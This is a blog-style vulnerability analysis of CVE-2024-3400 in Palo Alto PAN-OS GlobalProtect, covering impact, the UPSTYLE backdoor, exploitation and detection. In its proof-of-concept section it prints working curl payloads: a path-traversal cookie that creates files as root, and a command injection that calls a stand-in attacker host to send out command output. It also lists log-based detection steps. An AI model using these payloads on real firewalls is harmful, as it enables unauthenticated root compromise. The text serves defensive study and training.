CVE-2024-3400 Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect, a zero-day vulnerability in Palo Alto Networks PAN-OS.
This report details the discovery and exploitation of a critical zero-day vulnerability (CVE-2024-3400) in Palo Alto Networks GlobalProtect firewall appliances, allowing remote code execution. The article provides insights into vulnerability analysis, exploitation with a proof-of-concept, and detection. By understanding and addressing these vulnerabilities, organizations can improve their security posture and protect their systems from potential malicious attacks.
On April 12th, 2024, Palo Alto Networks announced CVE-2024-3400. CVE-2024-3400 is a CVSS 10 critical arbitrary file-write vulnerability in Palo Alto Networks PAN-OS software versions 10.2, 11.0, and 11.1. This vulnerability enables unauthenticated attackers to execute arbitrary Linux commands with root-level privileges on affected firewalls if firewalls are configured with a GlobalProtect gateway or portal (or both) and device telemetry enabled.
This blog article aims to provide an analysis of the command injection zero-day vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software, namely CVE-2024-3400. The Palo Alto Networks published the details of CVE-2024-3400, a severe command injection vulnerability with a CVSS score of 10, has unveiled an alarming risk to the system's integrity. This vulnerability have the potential to allow remote code execution (RCE) on affected systems, making them highly critical and deserving of immediate attention.
Malicious activity tracked by Palo Alto Networks under the campaign #OperationMidnightEclipse is targeting CVE-2024-3400, which exploits a vulnerability in certain versions of PAN-OS software.
CVE-2024-3400 is a pre-authenticated RCE flaw that was discovered in PAN-OS. This vulnerability allowing unauthenticated attackers to execute arbitrary code on impacted firewalls, with root privileges.
By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The severity for this vulnerability is 10 which is Critical.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Versions Affected:
This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.
Palo Alto Networks has reported active exploitation of this vulnerability in the wild. Third parties have publicly disclosed proof of concept (POC) of the vulnerability, potentially increasing the risk of exploitation on vulnerable servers.
To have a deeper understanding of the background of the two vulnerabilities and see the exploit in action with a proof-of-concept, first, we set up our lab, then talk about the issues in general and then on a technical level.
PAN-OS and GlobalProtect are both products of Palo Alto Networks.
PAN-OS is the operating system used by Palo Alto Networks' next-generation firewalls. It provides the core functionality and features for these firewalls, including network security, threat prevention, and management capabilities.
The ‘GlobalProtect’ is Palo Alto’s SSLVPN implementation, and this command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations is what enables the unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software, specifically affecting versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1. This vulnerability, designated as CVE-2024-3400, has a CVSS v3.x rating of 10 out of 10, indicating its a critical severity.
The vulnerability allows an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. It is important to note that this issue is specifically applicable to firewalls configured with the GlobalProtect gateway or GlobalProtect portal, or both. It is not necessary for device telemetry to be enabled for PAN-OS firewalls to be susceptible to attacks exploiting this vulnerability.
CVE-2024-3400 consists of two main parts: Arbitrary File Creation and Arbitrary Command Injection. The details are explained in the image below:
Zero-day exploitation of a vulnerability in Palo Alto Global Protect firewall devices that allowed for unauthenticated remote code execution to take place. Initial exploitation was used to create a reverse shell, download tools, exfiltrate configuration data, and move laterally within the network.
The threat actor has developed and attempted to deploy a novel python-based backdoor that Volexity calls UPSTYLE.
UPSTYLE Sample Recorded on Virustotal
The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests.
The purpose of the update.py script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in Python, starts by an import and its main content is stored as a base64 encoded blob. Therefore, by creating this file, each time any other code on the device attempts to import the module, the malicious code is executed.
Given the potential for Remote Code Execution (RCE), there are numerous possible exploitation scenarios when attackers have the ability to exploit this vulnerability. It is imperative for organizations to promptly address this issue to safeguard their PAN-OS firewalls from potential exploitation.
CVE-2024-3400, a critical vulnerability in PAN-OS within the GlobalProtect feature, involves a sequence of security weaknesses: Path Traversal, Arbitrary File Creation, and OS Command Injection. This combination of vulnerabilities allows attackers to do remote code execution, posing a significant risk to the affected systems.
The GlobalProtect application can be accessed from web interface. GlobalProtect serves an HTTPS service on port 443.
The web server sets a SESSID cookie for unauthenticated sessions and the data affiliated with the session cookie is placed in /tmp/sslvpn.
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../var/appweb/sslvpndocs/global-protect/portal/images/letsdefend.txt'
By sending the given request we were able to create file with root privileges.
Checking the session directory confirms that the data was written in the related path.
The vulnerability allows an attacker to create empty files with any name anywhere on the system as the root user. We've also found that the telemetry service can be exploited through a command injection by manipulating the file name parameter. As explained in the attackerb analysis:
Considering this, attackers could potentially inject malicious commands into the file names, which would be executed when the telemetry service processes them.
curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'
To replicate this we send an unauthenticated cURL request with a forged payload in the SESSID cookie value to the GlobalProtect web server in order to initiate remote code execution. The payload will be executed and deleted from the telemetry directory when the server runs its telemetry transmission function once per hour.
On the attacker machine, a Python web server receives a GET request that indicates our code was executed with root privileges.
Effective detection plays a crucial role in addressing this vulnerability. It is essential to have a comprehensive understanding of log paths, the utilization of relevant security products, and knowing where to look for potential indicators, enhancing the overall detection strategy.
Palo Alto Networks suggests the following steps for a quick check to identify attempted exploit activity in their writing.
grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*
failed to unmarshal session(../../some/path)
failed to unmarshal session(01234567-89ab-cdef-1234-567890abcdef)
Successful exploitation may result in artifacts being left in several directories and log files used by PAN-OS.
The NGINX frontend web server, responsible for proxying requests to the GlobalProtect service, logs all HTTP requests to /var/log/nginx/sslvpn_access.log.
Likewise, the file /var/log/pan/sslvpn-access/sslvpn-access.log will also record the HTTP requests, as demonstrated below:
When targeting the device telemetry for command injection, the attacker may place a file with zero length in one of the subdirectories within /opt/panlogs/tmp/device_telemetry/, such as /opt/panlogs/tmp/device_telemetry/hour/ or /opt/panlogs/tmp/device_telemetry/day/. This file's name will likely include characters suitable for command injection. Therefore, the contents of this directory and its subdirectories should be examined for any suspicious zero-length files.
The log file /var/log/pan/device_telemetry_send.log will display the injected command.
The Unit42 team has created XQL queries to search for signs of exploitation. These queries can assist in understanding the hunt for CVE-2024-3400.
Unit 42 Managed Threat Hunting Queries
To detect the exploitation of CVE-2024-3400, you can use public yara rules written by Cyber security community. Here are yara rules that detects exploitation attempts of CVE-2024-3400.
On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.
In conclusion, it is crucial to promptly apply the necessary patch for a clean version in order to address any vulnerabilities in the system. Additionally, establishing rules on security products to monitor processes and network connections can help generate alerts and ensure that the patching process is completed effectively. By resolving the "EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)" alert in the LetsDefend Training section, individuals can further develop their analysis skills and gain a deeper understanding of relevant vulnerabilities. This will ultimately enhance proficiency in vulnerability analysis and contribute to overall system security.
Public shared IOCs can be found on AlienVault OTX or in the volexity / threat-intel github repository
